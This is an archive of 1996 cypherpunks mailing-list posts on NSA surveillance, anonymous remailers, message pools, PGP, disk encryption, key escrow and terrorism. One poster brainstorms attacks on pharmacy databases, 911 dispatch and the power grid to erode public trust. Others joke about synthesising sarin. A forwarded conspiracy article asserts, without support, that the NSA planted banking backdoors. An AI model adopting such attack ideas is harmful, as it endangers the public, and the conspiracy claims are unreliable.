> Having said that, there's no question there are bad things you can
> do with anonymous re- mailers. There is potential for criminal
> behavior." *16
> 
> Banisar doubts that intelligence agencies are actually running
> re-mailers. It would entail a fairly high profile that they tend to
> shy away from, he said. However, it is likely that agencies are
> sniffing" monitoring traffic going to and from these sites, he said.
> --------------------------------------------------------------------
> 
> @ WORK SNIFFING THE NET
> 
> Not in doubt, however, is that the government is using the Internet
> to gather intelligence and is exploring the net's potential
> usefulness for covert operations. Charles Swett, a Department of
> Defense policy assistant for special operations and low-intensity
> conflict, produced a report last summer saying that by scanning
> computer message traffic, the government might see early warnings of
> impending significant developments." Swett added that the Internet
> could also be used offensively as an additional medium in
> psychological operations campaigns and to help achieve
> unconventional warfare objectives." *17 The unclassified Swett paper
> was itself posted on the Internet by Steven Aftergood of the
> Federation of American Scientists.
> 
> The document focuses in part on Internet use by leftist political
> activists and devotes substantial space to the San Francisco-based
> Institute for Global Communications (IGC), which operates Peacenet
> and other networks used by activists. IGC shows, Swett writes, the
> breadth of DoD-relevant information available on the Internet."
> 
> The National Security Agency is also actively sniffing" key Internet
> sites that route electronic mail traffic, according to Puzzle Palace
> co-author Wayne Madsen. In an article in the British newsletter
> Computer Fraud and Security Bulletin, Madsen reported that sources
> within the government and private industry told him that the NSA is
> monitoring two key Internet routers which direct electronic mail
> traffic in Maryland and California.18 In an interview, Madsen said
> he was told that the NSA was sniffing" for the address of origin and
> the address of destination" of electronic mail.
> 
> The NSA is also allegedly monitoring traffic passing through large
> Internet gateways by scanning network access points" operated by
> regional and long-distance service providers. Madsen writes that the
> network access points allegedly under surveillance are at gateway
> sites in Pennsauken, N.J. (operated by Sprint), Chicago (operated by
> Ameritech and Bell Communications Research) and San Francisco
> (operated by Pacific Bell). *19
> 
> Madsen believes that NSA monitoring doesn't always stop at the US
> border, and if this is true, NSA is violating its charter, which
> limits the agency 's spying to international activities. People
> familiar with the monitoring claim that the program is one of the
> NSA's `black projects,' but that it is pretty much an `open secret'
> in the communications industry," he wrote.
> 
> Electronic communications open up opportunities to broaden
> democratic access to information and organizing. They also provide a
> means and an opportunity for governments to pry. But just as people
> have a right to send a letter through the post office without a
> return address, or even to drop it in a mail box in another city, so
> too, electronic rights advocates argue, they have the right to send
> an anonymous, untraceable electronic communication. And just as the
> post office can be used maliciously, or to commit or hide a crime,
> re-mailers can be used by cruel or criminal people to send hate mail
> or engage in flame wars." And like the post office, the highways,
> and the telephone, the Internet could be used by spies or
> terrorists. Those abuses, however, do not justify curtailing the
> rights of the vast number of people who use privacy in perfectly
> legal ways.
> 
> Robert Ellis Smith, editor of the Privacy Journal newsletter, said
> government agencies seem obsessed with anonymous re-mailers. They
> were set up by people with a very legitimate privacy issue, he said.
> Law enforcement has to keep up with the pace of technology as
> opposed to trying to infiltrate technology. Law enforcement seems to
> want to shut down or retard technology, and that's not realistic.
> Anonymous re-mailers are not a threat to national security. *20
> -END--
> 
>                           SUBSCRIPTION INFO




- - -> Send "subscribe   snetnews " to majordomo@alterzone.com
- - ->  Posted by: "Donna J. Logan" <revcoal@pcnet.com>

- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 2 Jul 1996 18:18:16 +0800
To: cypherpunks@toad.com
Subject: whitehouse dossier database?
Message-ID: <199607020639.XAA13694@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



holy cow, is this real? Grabbe cites several credible references.
although of course he himself fits the bill as one of the world's
greatest conspiracy theorists (or trackers, depending on your
point of view <g>). I don't recall the article by Paul Rodriguez
of Washington Times, was it recent?


------- Forwarded Message

Date: Sun, 30 Jun 1996 20:16:49 -0500 (CDT)
Sender: owner-CN-L@cornell.edu
From: Brian Redman <bigred@duracef.shout.net>
To: Conspiracy Nation <CN-L@cornell.edu>

The following is brought to you thanks, in part, to the kind 
assistance of CyberNews and the fine folks at Cornell University.


              Conspiracy Nation -- Vol. 8  Num. 30
             ======================================
                    ("Quid coniuratio est?")
 
 
- - -----------------------------------------------------------------

THE WHITE HOUSE "BIG BROTHER" DATA BASE
=======================================

- - -----BEGIN PGP SIGNED MESSAGE-----

	   The White House "Big Brother" Data 
	   Base & How Jackson Stephens 
	   Precipitated a Banking Crisis

		 by J. Orlin Grabbe

	Score another coup for Jackson Stephens' 
Systematics (Alltel Information Services).  It provided the 
software for the White House's "Big Brother" data base 
system, and now the White House is in a panic that there 
may be secret methods of accessing its computer.

	The existence of the White House computer 
system and data base--known as WHODB, White House 
Office Data Base, and containing as many as 200,000 
names--was revealed by Paul Rodriguez in the *Washington 
Times*.  Some of the information was developed by 
*Insight*'s Anthony Kimery, soon to be managing editor of 
the electronic publication *SOURCES eJournal*.  Kimery is 
a writer whose articles in *The American Banker* and *Wired* 
were among the first to report U.S. government spying on 
domestic banking transactions.  (Kimery was also fired 
from one magazine for looking into the death of Vince 
Foster.)

	Now things have come full circle.  The chief 
government effort to spy on U.S. domestic banking 
transactions was directed by the electronic spy agency, the 
National Security Agency (NSA), working in connection 
with the Little Rock software firm Systematics.  
Systematics, half-owned by billionaire Jackson Stephens 
(of Stephens Inc. fame), has been a major supplier of 
software for back office clearing and wire transfers.  It 
was Stephens' attempt to get Systematics the job of 
handling the data processing for the Washington-D.C. 
bank First American that lead to the BCCI takeover of that 
institution.  Hillary Clinton and Vince Foster represented 
Systematics in that endeavor, and later Foster became an 
overseer of the NSA project with respect to Systematics.

	Working together, the NSA and Jackson Stephens' 
Systematics developed security holes in much of the 
banking software Systematics sold.  Now we face a crisis 
in banking and financial institution security, according to 
John Deutch, Director of the CIA.  "One obstacle is that 
banks and other private institutions have been reluctant to 
divulge any evidence of computer intrusions for fear that it 
will leak and erode the confidence of their customers.  
Deutch said 'the situation is improving' but that more 
cooperation was needed from major corporations, and said 
the CIA remains willing to share information with such 
firms about the risks they might face." (*The Washington 
Post*, June 26, 1996, page A19.)

	What Deutch failed to mention was that this 
"banking crisis" in large part was itself created by one of 
the U.S. intelligence agencies--the NSA in cahoots with 
Stephens' software firm Systematics.  The Citibank heist 
by Russian hackers, for example, took advantage of a back 
door in Citibank's Systematics software.  (The Russian 
hackers were apparently aided by the son of one of Jim 
Leach's House Banking Committee investigators.)  Have 
any major banks thought of instituting lawsuits over this 
deliberate breach of security on the part of a software 
supplier?  

	John Deutch has a proposed solution for this and 
other computer security problems: the creation of an  
"Information Warfare Technology Center".  Guess where 
he wants to put the Center: in the National Security 
Agency itself, naturally.  That is, the government wants 
money budgeted for a new bureaucracy to solve the 
problem another bureaucracy spent money creating.  You 
have to admire the sheer chutzpah of this kind of con--one 
which would also leave the NSA fox guarding the banking 
chicken coop.

	Meanwhile, over at the White House, senior aides 
are in a panic.  Is the WHODB system related to the 
PROMIS software? they want to know.  Is there a back 
door into the system?  Have files been download?

	It just goes to show that given the right incentive, 
even the White House will begin spouting conspiracy 
theories.  Perhaps Charles O. Morgan (see part 2 of my 
Vince Foster series) should write the White House a 
threatening letter.

- - -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdXLbWX1Kn9BepeVAQGSuwP7BOGXepZld6j1skJLnTfKYCDCBo3BZUyN
A7hEslyPUkSh7pLGpJhiPQcQf+uEq9eFVYqeUKV+toKgZvEr6nb924aNFq5ObZyV
3drfdlWwgxf503ShHcOW7D/mpu2I5u1P2yyV5sM1nBH/y9CzX/DXNL9l3nBop7wA
WmBXlraXros=
=BjAo
- - -----END PGP SIGNATURE-----
 
- - -----------------------------------------------------------------
     I encourage distribution of "Conspiracy Nation."
- - -----------------------------------------------------------------
If you would like "Conspiracy Nation" sent to your e-mail 
address, send a message in the form "subscribe cn-l My Name" to 
listproc@cornell.edu          (Note: that is "CN-L" *not* "CN-1")
- - -----------------------------------------------------------------
    For information on how to receive the improved Conspiracy 
  Nation Newsletter, send an e-mail message to bigred@shout.net
- - -----------------------------------------------------------------
Want to know more about Whitewater, Oklahoma City bombing, etc? 
(1) telnet prairienet.org (2) logon as "visitor" (3) go citcom
- - -----------------------------------------------------------------
       See also: http://www.europa.com/~johnlf/cn.html
- - -----------------------------------------------------------------
          See also: ftp.shout.net  pub/users/bigred
- - -----------------------------------------------------------------
Aperi os tuum muto, et causis omnium filiorum qui pertranseunt.
Aperi os tuum, decerne quod justum est, et judica inopem et 
  pauperem.                    -- Liber Proverbiorum  XXXI: 8-9 



- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 2 Jul 1996 18:05:53 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: The Net and Terrorism
In-Reply-To: <Pine.SUN.3.91.960701183304.1115A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.LNX.3.93.960702005417.99B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jul 1996, Simon Spero wrote:

>    I want my, I want my, I want my Atropine

	No, you don't. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 2 Jul 1996 19:12:45 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <4ra50l$is@joseph.cs.berkeley.edu>
Message-ID: <Pine.GUL.3.94.960702012429.17484A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On 1 Jul 1996, David Wagner wrote:

> Someone sniffing the Berkeley 'net can tell when I receive an
> alt.anonymous.messages message by when I download an article from
> the NNTP server

So, download every message, all the time, and junk posts that don't interest
you offline.

You betray yourself as an Evil Anonymous Communicator, but somehow I think
they might already know. You give no information about which messages you're
actually interested in unless your local workstation is compromised.

> Furthermore, even if you run a trusted NNTP server on your local
> machine, there are still vulnerabilities.  Someone sniffing on your
> subnet can tell when you inject a new message onto alt.anonymous.messages,
> as can your neighboring NNTP servers.

This is true. You'd have to generate white noise, again betraying yourself,
but only in general. "They" would need to track every message. To make it
more interesting, encrypt a bunch of messages for bogus PGP keys created for
the purpose. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 2 Jul 1996 19:30:09 +0800
To: cypherpunks@toad.com
Subject: Net and Terrorism.
Message-ID: <Pine.LNX.3.93.960702005840.99C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



I took a few days to think about this stuff, and I am replying to these
in bulk rather than seperately.

T.C. May wrote:

Can anything be done? To stop the likely effects of lots more
surface-to-air missiles, lots more nerve gas available on the black market,
and so on?

In a word, "no."
/*
     I disagree. Terrorism, political terrorism is fear. There are ways to
protect military targets that are quite cost effective, unfortunately they
are politically unpopular. (What just happend in Saudi is on my mind.
STUPID military commanders getting the same pie in the face time and time
again. There is NOTHING so unchanging as the military mind set.)

Civilian targets are harder to protect, but certain steps can be
taken to lessen chances of a sucessful attack.

Another method, and this would be very unpopular (and
hypocritical of the US) would be simply to announce that we (the Country)
are going to hold the _manufacturing_ nation responcible for the use of
weapons of mass destruction. So if Soviet Nerve Gas is used, we gas a
city in the Soviet Union. MAD carried to a lower level. 
	
A third option is quite simply to buy as much of it as possible. 
*/

I expect a city or two to get nuked in the next decade or so. (Haifa or Tel
Aviv would be my leading candidates.) To me, this is unsurprising.

/* 
My bets in the following order:
     Paris
     New York
     Rome
     London
     LA (by home brewed idiots)
     Chicago
     Berlin.
 
     I don't think that terrorists in the middle east will pop a nuke as
they would get as many of their own as the "enemy". One of the things a
terrorist needs more than money is a place to hide, and if you are killing
your own people, they won't shield you. 
*/

moderate economic or physical crises. (No, I am not a "survivalist," just
mentally and physically prepared to deal with a major earthquake, economic
dislocation, or terrorist incident in San Jose, which is 30 miles north of
me.)

/*     Sounds like a "survivalist" to me.  */

examples of how the Net can be used to undermine governments (what those
governments of course refer to as "terrorism," even when it is mostly not).

I'm not advocating such "terrorism," by the way, merely telling it like it is.

/*  
If you want to define terrorism as in the above paragraph, them I am,
and you do too. The biggest problem with terrorism is that there isn't a
good defination that looks the same from both sides. In otherwords the old
saw about one mans terrorist being anothers freedom fighter. Any
defination sufficiently inclusive so as to cover all "terrorist"
activities will also include uniformed soldiers. The lines get very thin
and blurry. 
*/


Keep your head down, avoid crowded downtown areas, prepare for moderate
disruptions, and reject arguments that an American Police State will do
anything to stop terrorism.

/*
The american police state (and if we aren't one yet, it isn't for lack
of trying) IS an instrument of terrorism in some parts of this country. 
*/

(Remember, terrorism is just warfare carried on by other means, with
apolgies to Von Clausewitz.)

/* Terrorism is when the other side hits with out warning. */



From: frantz@netcom.com (Bill Frantz)

Thanks Tim for your essay.  The only thing I would add is that terrorist
attacks  on pure information resources (e.g. the banking system) are likely
to result in many fewer casualties than terrorist attacks on physical
entities (e.g. major cities).  Another way of saying it is, email bombs are
preferable to snail mail bombs.

/* 
I don't think so. 

One objective of terrorism is/could be to lessen a populations faith
in "The System". Some possible situations (can't remember how to spell
scenireo):

Trash a multi-store pharmacy database and people can't get their
prescriptions, or worse get the wrong one. 

Cause disturbances in certain parts of certain cities, then attack
the 911 system to route officers and firemen to _wealthy_ neigborhoods at
the expense of the poor neighborhoods. Then complain to the papers about
it. 

Gain control of the power grid (I don't know how possible this is)
and selectively brown out certain sections of the city during peak demand
periods. Make it obvious, then do the preceeding idea.  

In all of these people will, or could die, but are much more
effective in undermining the faith people have in the structures that run
the country. If a bomb blast goes off, people get pissed off at the bomb
makers, if the power fails, people get pissed at the electrical company.
If you can create a large enough disturbances they will be better than
bombs.
*/ 

From: "Vladimir Z. Nuri" <vznuri@netcom.com>

[TCM]
>Can anything be done? To stop the likely effects of lots more
>surface-to-air missiles, lots more nerve gas available on the black market,
>and so on?
>In a word, "no."

try to have a warfare, siege-like mentality imho, and a continual
"trying to stay ahead of the criminals". we do not have
regular open terrorism in the streets of the US and I see no reason
to think there ever will be as TCM suggests.

/* 

Depending on how you define "terrorism" I would like you to visit my
neighborhood, and then we can go to a couple other here in chicago where
the cops terrorize the citizens, the gangs terrorize the cops and the
citizens, etc. It hasn't hit the national level yet, but it will. 

*/

nevertheless what his essay misses, and many in law enforcement miss,
are the root reasons for crime. I'm not going to sound like a liberal

/*
There is a big difference (IMO) between a terrorist and a common criminal.
Money and Ideology. In *MOST* instances the terrorist is attempting to
acheive a political, social, or long term (as in decades/generations)
economic change. A criminal is simply trying to get rich or get stoned.
IMO the root cause of crime is a lack of self disipline, and it is as far
as I can tell part of the human condition. 
*/

in reality. it seems to me no nation-state has ever experimented with
trying to take away the root causes of violence and discontent. 
why? 

/* 
Is it possible that to a large degree the nation-state IS the problem?
*/

because a policeman holding a gun is so much more visceral and
the public responds to this image readily.  other "programs" that
try to decrease discontent among the budding terrorists of tommorrow
are usually ridiculed. it is very difficult to prove that they work

/*
Rightly so. Most of these programs amount to hand-outs or paternalistic
pandering. People need to work, not get paid for doing nothing. 
*/ 

terrorists invariably have a 
patricular pathological psychological profile that sees the world
in terms of "martyrs vs. villians" with the villians in the government,
and the villians taking away or abusing respectable citizens.

/* 
Often they are right. 
*/

the "problem" of terrorism will be solved when we take the view
that insanity and violence is *not* 
a natural aspect of human behavior (as TCM tends to suggest), and that

/* 
It is. Insanity is a condition that occasionaly crops up in humans.
Sometimes the problem is chemical, sometimes not, however it _is_ natural.
So is violence. People want things, and some don't care what they have to
do to get these things. 
*/

>(Remember, terrorism is just warfare carried on by other means, with
>apolgies to Von Clausewitz.)

disagree. the purpose of warfare has traditionally been to seize
something tangible like territory. terrorists are after intangibles--
namely, terror itself, disrupting a "peace process", etc. 

/* 
Or forcing a certain group to the discussion table.
*/

Any Obcrypto I could add at this point would be preaching to the choir. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Tue, 2 Jul 1996 21:16:59 +0800
To: cypherpunks@toad.com
Subject: Re: fbi botches intel "ecspionage" case
In-Reply-To: <199606291925.MAA12512@netcom3.netcom.com>
Message-ID: <Pine.HPP.3.93.960702030505.9711B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




> at the end of the show, the reporter stated that
> the FBI was seeking stronger laws against theft
> of "intellectual property" in congress that might
> solve the problem.


  Their main concern when they contacted me about me message to 'Blacknet'
is that 'InterNational Terrorists(tm)' would use it to sneak US industry
secrects out of the country.


Thought for the Day:
  No matter what pious reason created the entity, Every Entity's primary
and over-ruling goal is self-preservation; and no where is this more true
than in Gov't, the IRS, and the FBI






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 2 Jul 1996 21:13:46 +0800
To: snow <ses@tipper.oit.unc.edu>
Subject: Re: The Net and Terrorism
Message-ID: <v02120d07adfea24e2f39@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:54 7/2/96, snow wrote:
>On Mon, 1 Jul 1996, Simon Spero wrote:
>
>>    I want my, I want my, I want my Atropine
>
>        No, you don't.

Simon, you got to be more careful when synthesizing that Sarin. Always
check that the vent is working first.





-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 2 Jul 1996 21:54:44 +0800
To: cypherpunks@toad.com
Subject: But what about the poor?
Message-ID: <2.2.32.19960702103730.00bb4544@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 7/1/96 -0700, Bill Frantz wrote:

>Current government "Key Escrow" systems cost $200/key/year. [Craig Mundie] 
>These systems can best be described as key-rental systems.

This is shocking, shocking.  It never occurred to me that our government
would charge us for the benefit of being tapped.  What about the poor.  I'm
going to write Senator Kennedy and see if maybe we can get the selfish
Republican Congress to free up some cash so that less fortunate Americans
can afford to be tapped too.

This argument against key escrow never made it onto that long list of
questions we made up in the Spring of '93 when Key Escrow was first proposed
by the Admin (it was probably Vince Foster's fault).  We showed a lack of
imagination.

DCF

"Gee Ossifer I'd love to let you read my files but I just couldn't afford
expensive socialistic key escrow so I bought cheap efficient private key
escrow instead."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 3 Jul 1996 01:45:04 +0800
To: cypherpunks@toad.com
Subject: PGP secret keys
Message-ID: <199607021339.GAA02261@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone post a pointer to a FAQ that tells what to do if you loose
your secret key file?  How can you regenerate your private key so that the
userid number still matches the public key that has been distributed??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Wed, 3 Jul 1996 03:17:35 +0800
To: cypherpunks@toad.com
Subject: hard drive encryption
Message-ID: <2.2.32.19960702145307.006bb7ac@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


              
What is the best utility freely available for encrypting an entire drive
that won't be used for a length of time?  ie: I'm going away for a period
of time and wish to encrypt the drive while I'm gone, but have no interest
in actually using it while it's encrypted.  I also have no real preference
in what algorithm is used, as long as it's relatively secure.  Speed is 
also not a big consideration, as it will be used once when I leave to encrypt,
and once when i return to decrypt.  
Thanks in advance for the help... 
//cerridwyn//

btw, the OS is Win95 if that matters...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 2 Jul 1996 18:45:50 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <adfe19830002100425c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I must be missing something....:

At 3:28 AM 7/2/96, David Wagner wrote:

>Someone sniffing the Berkeley 'net can tell when I receive an
>alt.anonymous.messages message by when I download an article from
>the NNTP server; they can tell when I send such an article by when
>I upload an article to the NNTP server; they can list all the
>``subversive'' Berkeley folks who have read alt.anonymous.messages
>lately.
>
>The local NNTP server must be trusted.

I'm not following your "upload an article to the NNTP server." Don't most
people use mail-to-News gateways to post anonymously? (If not, they should,
of course.)

This way, the posting of an article has the anonymity provided by the chain
of remailers used to reach the terminal site, the mail-to-News gateway.

The posting is anonymous (within the usual limits we discuss here), and the
reading is "pretty hard" to focus on, for several reasons:

1. Hard to gain access to local ISP without sending alerts out (it would be
for my ISP, at least). This is admittedly not cryptographically
interesting, but is a very real practical difficulty.

2. Many who browse alt.anonymous.messages probably "glance" at many of the
oddly-named message pool messages. I know I do. Again, makes it a "needle
in a haystack" to know which of several hundred folks who glanced at
"ToBear" or "TheRealMessage"--assuming the NSA could ever identify these
hundreds--is the real intended target.

3. And I recall that many have newsreaders which download _all_ messages in
a newsgroup automatically. Again, this makes the pool of potential readers
quite large and meaningless to try to track.

The use of public posting areas for message pools (what I called "Democracy
Walls" several years back) seems to me have several compelling advantages
over "reply-block" approaches.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 3 Jul 1996 03:48:18 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: hard drive encryption
Message-ID: <199607021524.IAA22324@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Currently, SecureDrive seems to be the most reliable under Win95.

Check out:

http://www.eskimo.com/~joelm/cryptbk.html

I just published a cookbook on how to build a "CryptoBook" (a secure PC
laptop with all sorts of crypto goodies).  Details on SecureDrive are included.

Joel

At 07:53 AM 7/2/96 -0700, you wrote:
>              
>What is the best utility freely available for encrypting an entire drive
>that won't be used for a length of time?  ie: I'm going away for a period
>of time and wish to encrypt the drive while I'm gone, but have no interest
>in actually using it while it's encrypted.  I also have no real preference
>in what algorithm is used, as long as it's relatively secure.  Speed is 
>also not a big consideration, as it will be used once when I leave to encrypt,
>and once when i return to decrypt.  
>Thanks in advance for the help... 
>//cerridwyn//
>
>btw, the OS is Win95 if that matters...
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 3 Jul 1996 01:51:07 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: rsync and md4
In-Reply-To: <1.5.4.16.19960702023938.4637d0c4@arc.unm.edu>
Message-ID: <199607021238.IAA13218@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> What is the difference between SHA and SHA-1? Is this algorithm subject
> to the same licensing as MD5?

The difference between SHA and SHA.1 is the "small technical change"
that was added last year.  I'm not sure what you mean by "licensing",
since there are no licensing issues for MD5 (unless you mean "export
issues", in which case SHA, SHA.1 and MD5 all fall into the same
category).

> Could someone point me to such a bootleg version for DOS, please?

Umm, good luck.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 06:09:52 +0800
To: ses@tipper.oit.unc.edu>
Subject: Re: The Net and Terrorism
Message-ID: <199607021646.JAA16308@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:23 AM 7/2/96 -0700, Lucky Green wrote:
>At 0:54 7/2/96, snow wrote:
>>On Mon, 1 Jul 1996, Simon Spero wrote:
>>
>>>    I want my, I want my, I want my Atropine
>>
>>        No, you don't.
>
>Simon, you got to be more careful when synthesizing that Sarin. Always
>check that the vent is working first.

Also, you don't want JUST that atropine; trimedoxime and benactyzine are 
also  helpful.

BTW, the first symptom of sarin poisoning is a tightness in the chest...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 06:24:07 +0800
To: cypherpunks@toad.com
Subject: Re: LOS_tit
Message-ID: <199607021650.JAA16623@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 7/2/96 GMT, John Young wrote:
>   7-2-96 UST, page one: 
>      The Clinton administration is to announce, as early as 
>      this week, a commission to determine the federal 
>      government's role in securing cyberspace, from terrorism 
>      to petty crimes. 
>   http://pwp.usa.pipeline.com/~jya/lostit.txt   (13 kb) 


A commission which will probably be made up of government, ex-government, 
and industry people, totally ignoring ordinary citizens yet again.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 07:25:22 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: But what about the poor?
Message-ID: <199607021705.KAA17479@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:37 AM 7/2/96 -0400, Duncan Frissell wrote:
>At 11:25 PM 7/1/96 -0700, Bill Frantz wrote:
>
>>Current government "Key Escrow" systems cost $200/key/year. [Craig Mundie] 
>>These systems can best be described as key-rental systems.
>
>This is shocking, shocking.

Oh, but what a business opportunity!  I assume a floppy can hold 1000 keys.  
Even if I undercut the going rate of $200 per year by a factor of 10, that's 
a potential income of $20,000 per floppy per year.  A box of 20 floppies on 
the shelf, and I'm set for life!


>This argument against key escrow never made it onto that long list of
>questions we made up in the Spring of '93 when Key Escrow was first proposed
>by the Admin (it was probably Vince Foster's fault).  We showed a lack of
>imagination.

There's no doubt that the government will want to bribe the escrow agents, 
first to tolerate the system at all, and second to foster enthusiastic 
cooperation later on, and possibly even ILLEGAL cooperation.  Over-paying 
them is just one way to do it.

One thing that never ceases to amaze me is how the government can continue 
to ignore the likelihood (hell, certainty!) that since "key escrow" will 
only be attractive to the extent it actually benefits the user, such users 
will be served by escrow agents who store only encrypted  or 
anonymously-held keys.  These are inherently protected against any kind of 
disclosure, yet provide all the claimed benefits of key escrow.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 3 Jul 1996 02:30:42 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: PGP secret keys
In-Reply-To: <199607021339.GAA02261@jobe.shell.portal.com>
Message-ID: <199607021427.KAA15410@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Could someone post a pointer to a FAQ that tells what to do if you loose
> your secret key file?  How can you regenerate your private key so that the
> userid number still matches the public key that has been distributed??

Pretty much you are SOL.  To re-create the secring from the pubring
you need to find the secret components of your secret key.  The only
known way of doing that is factoring you key.  How big is it?  If it
is in the range of 384-512 bits, then we can probably reproduce your
secring in about a year.  If its any bigger than that, all you can
really do is generate a new key.

You don't want to generate a key that has the same keyID, since it
wont be able to decrypt any messages that the old one could anyways.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 07:28:58 +0800
To: Cerridwyn Llewyellyn <cypherpunks@toad.com
Subject: Re: hard drive encryption
Message-ID: <199607021730.KAA18844@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:53 AM 7/2/96 -0700, Cerridwyn Llewyellyn wrote:
>              
>What is the best utility freely available for encrypting an entire drive
>that won't be used for a length of time?  ie: I'm going away for a period
>of time and wish to encrypt the drive while I'm gone, but have no interest
>in actually using it while it's encrypted.  I also have no real preference
>in what algorithm is used, as long as it's relatively secure.  Speed is 
>also not a big consideration, as it will be used once when I leave to encrypt,
>and once when i return to decrypt.  
>Thanks in advance for the help... 

You could just de-install and hide the drive.  Replace it with some old cast-off 
drive.  (The easiest way to get somebody to stop looking for something is to 
let him find it.)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 07:03:35 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <199607021730.KAA18852@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:28 PM 7/1/96 -0700, David Wagner wrote:

>If folks have better ideas for how to achieve really good recipient
>anonymity, I hope they'll speak up!

Once they start offering Internet news/email/USENET feeds (one way) by 
DSS-type dish antenna from satellite, it'll be mighty hard to figure out 
who's receiving the data. They could probably easily provide 10 megabits per 
second, which I assume would be more than enough for what's needed.

(BTW, for a few years a company called "Planet Connect" has been providing 
FIDOnet data feeds, although they use the older-style, large antenna 
systems, and their data rate is 19.2kbps, not even close to enough for 
Internet service.)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 07:27:51 +0800
To: cypherpunks@toad.com
Subject: Re: SAFE Forum
In-Reply-To: <199607020623.XAA19680@netcom7.netcom.com>
Message-ID: <Pine.GUL.3.94.960702105231.22017B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jul 1996, Bill Frantz wrote:

